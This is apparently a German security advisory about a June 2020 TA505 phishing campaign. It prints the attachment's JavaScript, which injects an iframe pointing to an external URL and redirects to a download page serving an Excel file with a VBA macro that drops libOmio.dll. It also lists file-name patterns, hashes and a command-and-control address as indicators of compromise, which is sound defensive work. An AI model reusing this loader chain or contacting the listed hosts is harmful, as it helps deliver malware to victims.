Neue Mail-Kampagne von TA505

Die Hacker-Gruppe TA505 versendet seit gestern Morgen E-Mails mit HTML-Dokumenten als Dateianhang.

Dabei handelt es sich um Dateien mit dem Namensschema

Neues Dokument20200608<8 dezimalzeichen="">.html</8>

Der HTML-Code enthält einen JavaScript Code, der ein iFrame-HTML-Element in einen Platzhalter-Element einbaut:

<div id="placeholder"></div>

<script id="iframeTemplate" type="text/html"></script>

   <iframe style="width: 100%; height: 100%; border: 0px" src="http://rimaje.nl/~rick/ux1ut.html"></iframe>

<script type="text/javascript"></script>

var element,

   html,

   template;

element = document.getElementById("placeholder");

template = document.getElementById("iframeTemplate");

html = template.innerHTML;

element.innerHTML = html;

Der iFrame lädt die URL http://rimaje[.]nl/~rick/ux1ut.html

Dieses HTML Dokument enthält wiederum nur eine Weiterleitung in Form eines kleinen JavaScript-Codes:

<script type="text/javascript"></script>

location="https://dl-09756546.eu-download[.]com/download.php";

Die Zielseite lädt dann eine Excel-Datei mit folgendem Namensschema herunter:

Neues Dokument20200608<8 dezimal="" zeichen="">.xls</8>

Die Datei enthält ein VBA-Makro, was bei Aktivierung der „Inhalte aktivieren“-Funktion von Excel, die Datei %APPDATA%\Roaming\Microsoft\Windows\Templates\libOmio.dll erzeugt.

Die Excel-Datei ist in der folgenden Abbildung zu sehen.

IOCs

Dateianhang

Namensschema: Neues Dokument20200608\d{8}\.html

SHA256: 2587f8ab9156032d065c7bd8b81aa565dd0713d75eb628e1571e2205dceb0f4f

Excel Dokument

Namensschema: Neues Dokument20200608\d{8}\.xls

SHA256: 36B58DC47A56E3AF9D8D53D52DB0A6828592F21E043C795D34C3FE383CEFDCB1

libOmio.dll

Pfad: %APPDATA%\Roaming\Microsoft\Windows\Templates\libOmio.dll

SHA256: cfbc15df6b6e6be284271fa31fbf577af26c1eb9a8c07e3bec950e43f535200a

C2: 185.176.221.97:443 (sdff-corp.com)